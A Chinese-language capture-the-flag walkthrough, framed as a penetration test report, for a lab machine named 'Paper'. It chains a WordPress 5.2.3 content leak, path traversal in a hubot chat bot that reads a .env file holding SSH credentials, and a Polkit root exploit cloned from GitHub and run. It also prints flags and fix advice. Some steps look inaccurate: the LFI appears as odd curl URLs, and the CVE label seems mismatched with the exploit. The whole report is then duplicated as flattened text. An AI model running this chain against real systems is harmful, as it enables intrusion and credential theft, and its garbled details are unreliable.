[Meachines] [Easy] Paper Wordpress 5.2.3未授权访问+hubot-rocketchat LFI+Polkit权限提升
字数 1167 2025-08-22 12:23:36

WordPress 5.2.3未授权访问 + hubot-rocketchat LFI + Polkit权限提升综合渗透测试报告

1. 信息收集

1.1 目标识别

  • IP地址: 10.10.11.143
  • 开放端口:
    • 22/tcp (SSH - OpenSSH 8.0)
    • 80/tcp (HTTP - Apache 2.4.37)
    • 443/tcp (HTTPS - Apache 2.4.37)

1.2 Web服务识别

  • Web服务器: Apache/2.4.37 (CentOS) with OpenSSL/1.1.1k, mod_fcgid/2.3.9
  • WordPress版本: 5.2.3
  • 域名发现:
    • office.paper
    • chat.office.paper

2. 漏洞利用路径

2.1 WordPress 5.2.3未授权访问漏洞

漏洞描述: WordPress 5.2.3存在未授权访问漏洞,允许攻击者查看私有内容。

利用步骤:

  1. 访问目标网站: http://office.paper/
  2. 添加hosts记录:
    echo '10.10.11.143 office.paper' >> /etc/hosts
    
  3. 使用未授权访问参数:
    curl 'http://office.paper/?static=1'
    
  4. 发现隐藏的子域名: chat.office.paper
    echo '10.10.11.143 chat.office.paper' >> /etc/hosts
    

2.2 hubot-rocketchat本地文件包含(LFI)漏洞

漏洞描述: hubot-rocketchat存在本地文件包含漏洞,可读取服务器上的任意文件。

利用步骤:

  1. 访问发现的子域名: http://chat.office.paper/
  2. 利用LFI漏洞读取敏感文件:
    curl 'http://chat.office.paper/list'         # 列出当前目录
    curl 'http://chat.office.paper/list../'      # 列出上级目录
    curl 'http://chat.office.paper/file../hubot/.env'  # 读取.env文件
    
  3. 获取到凭证:
    username: recyclops
    password: Queenofblad3s!23
    

2.3 SSH登录

  1. 使用获取的凭证通过SSH登录:
    ssh recyclops@10.10.11.143
    
  2. 获取user flag:
    5f02c513c06b2e212e3433c1a09e5103
    

3. 权限提升(Polkit漏洞)

3.1 Polkit漏洞利用

漏洞描述: Polkit (CVE-2021-4034)是一个权限提升漏洞,允许低权限用户获得root权限。

利用步骤:

  1. 下载漏洞利用代码:
    git clone https://github.com/Almorabea/Polkit-exploit
    
  2. 编译并执行漏洞利用:
    cd Polkit-exploit
    make
    ./exploit
    
  3. 成功获取root权限后读取root flag:
    97ae0f9636f32f353b018406349c97ad
    

4. 漏洞修复建议

4.1 WordPress修复

  • 立即升级WordPress到最新版本
  • 禁用未授权访问功能或实施适当的访问控制

4.2 hubot-rocketchat修复

  • 升级hubot-rocketchat到最新版本
  • 实施输入验证,防止路径遍历攻击
  • 将敏感文件(如.env)移出web可访问目录

4.3 Polkit修复

  • 应用最新的安全补丁
  • 升级系统软件包:
    yum update polkit -y
    

5. 总结

本次渗透测试通过以下路径成功获取系统最高权限:

  1. 利用WordPress 5.2.3未授权访问漏洞发现隐藏子域名
  2. 通过hubot-rocketchat的LFI漏洞获取SSH凭证
  3. 使用获取的凭证登录系统
  4. 利用Polkit漏洞提升至root权限

建议系统管理员立即修复上述漏洞,并定期进行安全审计。

WordPress 5.2.3未授权访问 + hubot-rocketchat LFI + Polkit权限提升综合渗透测试报告 1. 信息收集 1.1 目标识别 IP地址: 10.10.11.143 开放端口: 22/tcp (SSH - OpenSSH 8.0) 80/tcp (HTTP - Apache 2.4.37) 443/tcp (HTTPS - Apache 2.4.37) 1.2 Web服务识别 Web服务器: Apache/2.4.37 (CentOS) with OpenSSL/1.1.1k, mod_ fcgid/2.3.9 WordPress版本: 5.2.3 域名发现: office.paper chat.office.paper 2. 漏洞利用路径 2.1 WordPress 5.2.3未授权访问漏洞 漏洞描述 : WordPress 5.2.3存在未授权访问漏洞,允许攻击者查看私有内容。 利用步骤 : 访问目标网站: http://office.paper/ 添加hosts记录: 使用未授权访问参数: 发现隐藏的子域名: chat.office.paper 2.2 hubot-rocketchat本地文件包含(LFI)漏洞 漏洞描述 : hubot-rocketchat存在本地文件包含漏洞,可读取服务器上的任意文件。 利用步骤 : 访问发现的子域名: http://chat.office.paper/ 利用LFI漏洞读取敏感文件: 获取到凭证: 2.3 SSH登录 使用获取的凭证通过SSH登录: 获取user flag: 3. 权限提升(Polkit漏洞) 3.1 Polkit漏洞利用 漏洞描述 : Polkit (CVE-2021-4034)是一个权限提升漏洞,允许低权限用户获得root权限。 利用步骤 : 下载漏洞利用代码: 编译并执行漏洞利用: 成功获取root权限后读取root flag: 4. 漏洞修复建议 4.1 WordPress修复 立即升级WordPress到最新版本 禁用未授权访问功能或实施适当的访问控制 4.2 hubot-rocketchat修复 升级hubot-rocketchat到最新版本 实施输入验证,防止路径遍历攻击 将敏感文件(如.env)移出web可访问目录 4.3 Polkit修复 应用最新的安全补丁 升级系统软件包: 5. 总结 本次渗透测试通过以下路径成功获取系统最高权限: 利用WordPress 5.2.3未授权访问漏洞发现隐藏子域名 通过hubot-rocketchat的LFI漏洞获取SSH凭证 使用获取的凭证登录系统 利用Polkit漏洞提升至root权限 建议系统管理员立即修复上述漏洞,并定期进行安全审计。